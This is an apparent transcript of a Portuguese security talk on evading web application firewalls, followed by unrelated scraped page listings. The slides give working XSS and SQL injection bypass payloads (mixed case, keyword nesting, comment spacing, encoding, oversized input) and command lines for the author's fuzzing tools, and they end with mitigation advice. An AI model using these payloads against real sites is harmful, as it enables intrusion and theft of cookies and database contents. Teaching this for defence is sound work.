Burlando Waf 2.0

1/41®

Burlando um WAF

22 de junho de 2015

2/41®

Quem sou ?● Antonio Costa “Cooler_”

● Desenvolvedor em ASM, C, C++, Lisp, Perl, PHP etc...

● Pentest, codereview, engenharia reversa e pesquisas para problemas diversos etc...

● @Cooler_freenode● https://github.com/CoolerVoid

● acosta@conviso.com.br

● coolerlair@gmail.com

3/41®

Agenda

● Entendendo o problema● Burlando um WAF● Automatizando o ataque● Sugestões para mitigação

4/41®

Entendendo o Problema

● WAF (web application firewall)● Filtro com conjunto de regras ● Protege de ataques comuns ● Registra informações de ataques● Bloqueia ataques

5/41®

● Filtra tanto Request como Response

6/41®

● Request exemplo:GET /sell/cars.php?search=<script>alert(document.cookie)</script >

7/41®

● Match exato● BlackList...● “alert(”,● ”union”● “select”● “script”● “eval”...

8/41®

● Block por IP● DoS● E se spoofar ?

Spoofing ?

9/41®

Entendendo o Problema● Regras não são suficientes... ● Expressão regular “regex” não faz matching

10/41®

Entendendo o Problema● ReDOS (Regular expression denial of service)

● Agrupamento ● Repetição e Alternância com sobreposição

● ([A-Za-z]+)*([0-9]+)*● ([0-9a-z]|\d+)*

11/41®

Burlando um WAF

12/41®

Burlando um WAF

● Como Detectar o WAF ? ● Descobrimento de um WAF pode se dar por alguns fatores são eles

“header” da Response, por cookies e outros meios.

● Pode-se fazer manualmente, entretanto é interessante automatizar com ferramentas:

● https://svn.nmap.org/nmap/scripts/http-waf-detect.nse

● https://github.com/sandrogauci/wafw00f

● http://code.google.com/p/imperva-detect/

● …

13/41®

Burlando um WAF

Mixed Case ● Em alguns casos o “patern matching” para um elemento de uma

blacklist seria “case sentive”, ou seja qualquer caractere que esteja fora do padrão não irá passar por “matching”.

● “select” é diferente de “SeLecT”,”sEleCt”,”seLecT”...

● “script” é diferente de “sCriPT”,”ScRipT”...

● Entretanto o paylaod pode ser interpretado seja ataque de XSS ou SQL injection, isso pois o ambiente que interpreta não é “case sentive”.

● Exemplo:

● /sell/cars.php?search=<script>alert(document.cookie)</script

● /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>

14/41®

Burlando um WAF

Replace Keywords ● Alguns casos que não ocorre um block, fazem troca de uma string por outra,

exemplo se encontra palavra “union select” substitui por “” ou seja acaba trocando por nada( apaga a ocorrência de uma palavra), logo á Request continua não é bloqueada.

● Como atacante pode se aproveitar disso ?

● Exemplos:

● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9

● Assim que o WAF fazer replace(troca) então temos:

● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9

15/41®

Burlando um WAF

Spaces to comment ● Trocar espaços em branco por comentários “/**/”, ou mesmo

adicionar comentários em pontos aleatórios, ajuda a fugir do “match”.

● Exemplos:

● /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()– -

● /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -

16/41®

Burlando um WAFBuffer Overflow

● Crashar aplicação forçando buffer overflow deixa o caminho livre para nossos payloads.

● Exemplos:

● /cars/id/page/=-25+and+(select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7…

● id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)+uNIoN+seLecT+2,3,version()...

● Por que isso ocorre ?

● Nem todo WAF segue uma prática correta para limitar o buffer de entrada, logo um payload com tamanho extremo pode causar buffer overflow. funções como strcpy(),strcat() sem devido buffer limitado e definido podem causar estes problemas, por isso o recomendado é usar funções como strncat() ou mesmo strncpy().

17/41®

Burlando um WAF● Outras formas... ● Objetivo é o mesmo burlar

18/41®

Burlando um WAFEncodes

● Codificando os payloads podemos enganar o “match”, os mais usados são encode64, url encode, double url encode...

● Exemplo:

● Url encode:

%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript

● 64 encode

PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=

19/41®

Burlando um WAF● HPP(HTTP Parameter Pollution) ● Uma técnica que visa enviar muitos parâmetros para assim

burlar filtros de ambientes.

20/41®

Burlando um WAF

● Mude o IP use Proxy ● Mude o User Agent

21/41®

Burlando um WAF

● Ataques ao mesmo tempo? BLOCK !

● Delay de tempo em cada Request ● Periodicidade no tempo

● Diversidade

-Mudar IP

-Mudar Payload

-Mudar UserAgent

22/41®

Burlando um WAF

● Outras formas... ● obfuscar ● encodar apenas um

caracter etc...

23/41®

Automatizando o ataque● Por que automatizar ?

24/41®

Automatizando o ataque● Payloadmask

https://github.com/CoolerVoid/payloadmask

25/41®

26/41®

● Futuro da ferramenta

github.com/CoolerVoid/payloadmask/issues

27/41®

Automatizando o ataque● 0d1n

https://github.com/CoolerVoid/0d1n

28/41®

Automatizando o ataque● 0d1n

https://github.com/CoolerVoid/0d1n

29/41®

Automatizando o ataque

30/41®

31/41®

32/41®

Automatizando o ataque● Exemplo:

./0d1n –host http://localhost/test.php –post ”car_name=ˆ ” –payloads payloads/xss.txt

–find_regex_list payloads/guess.txt –log name_log –save_response –tamper urlencode -proxy-rand paylaods/proxy.txt

33/41®

34/41®

35/41®

Automatizando o ataque● Exemplo:

./0d1n –host http://localhost/test.php –post ”car_name=ˆ ” –payloads payloads/xss.txt

–find_regex_list payloads/guess.txt –log name_log –save_response

36/41®

Automatizando o ataque● Futuro da ferramenta...

github.com/CoolerVoid/0d1n/issues

37/41®

Automatizando o ataque●

38/41®

Sugestões para mitigação

● Não usar Regex que tenha redundância ● Usar Whitelist e não Blacklist.

● Prevenção sempre, contratar serviços para auditoria na aplicação

● Não esperar que o WAF faça tudo...

● Sanitizar informações e validar

● Mantenha o ambiente Hardenizado.

39/41®

Agradecimentos !

● IAK, Sigsegv, M0nad, Slyfunky, Clandestine, Robertux, F117, Loganbr, MMxM, eremita, Mente Binaria, Otacon, Ephexis, pl4nkt0n, necrist, dr_gordon, sheilong etc... galera do IRC etc..

● Aos Mestres da CONVISO

● Ulisses Castro por ter dado sugestão do “Tamper”

40/41®

Perguntas ???

41/41®

Burlando Waf 2.0

Technology

Transcript of Burlando Waf 2.0

e médias empresas - Brother Brasil · Hi-Speed 2.0 Hi-Speed 2.0 Hi-Speed 2.0 Hi-Speed 2.0 Hi-Speed 2.0 Hi-Speed 2.0 ... Co nt rl e BRAdmin Light, Gerenciamento via Web, BRAdmin Pro3,

FOTOGRAFIA 2.0

WEB 2.0, E-LEARNING 2.0, EAD 2.0 PARA ONDE CAMINHA A EDUCAÇÃO A DISTÂNCIA?

ModSecurity: Firewall OpenSource para A plicações W eb (WAF)

Travel 2.0. - Turismo 2.0.

C# 2.0 Paulo Marques Hernâni Pedroso. C# 2.0 1 - Introdução.

Biblioteca 2.0 +web 2.0

NF-e 2.0 para Escritórios Contábeis 2.0

WAF User Guide - ncloud24.com · 2017. 4. 25. · waf은지능형웹애플리케이션방화벽니다 . waf은웹서버앞단에위치하여외부로부터 들어오는http/https

CNAE 2.0 - Estrutura detalhada CNAE 2.0 (DEZEMBRO 2006)

UTILIZANDO FIREWALL DE APLICAÇÃO NO PROCESSO DE ... · O presente trabalho apresenta a ferramenta UniscanWAF, um Web Application Firewall (WAF), capaz de detectar comportamentos

Educação 2.0

Incapsula 01 B6516 - NVC · Incapsulaはアプライアンス型WAF市場でリーダークラスのImperva社が運営している 高い検知精度と信頼性を持ったクラウド型WAFサービスです。

Enterprise 2.0

Sem resistência: burlando sandboxes baseadas em arquivos · 2014-12-08 · FireEye, Inc. Sem resistência: burlando sandboxes baseadas em arquivos 3 Introdução Os profissionais

Vendas 2.0

Biblioteca 2.0

Burlando Proteções - Slide Final

Consumidor 2.0

Acompanhe uma descrição resumida do ServerU Netmap L-100 · Roteamento BGP & OSPF Firewall & Security Appliances Intrusion Detection Systems WAF (Web Application Firewall) CARACTERÍSTICAS

Incapsula 01 B6516 - NVC · Incapsulaはアプライアンス型WAF市場でリーダークラスのImperva社が運営している高い検知精度と信頼性を持ったクラウド型WAFサービスです。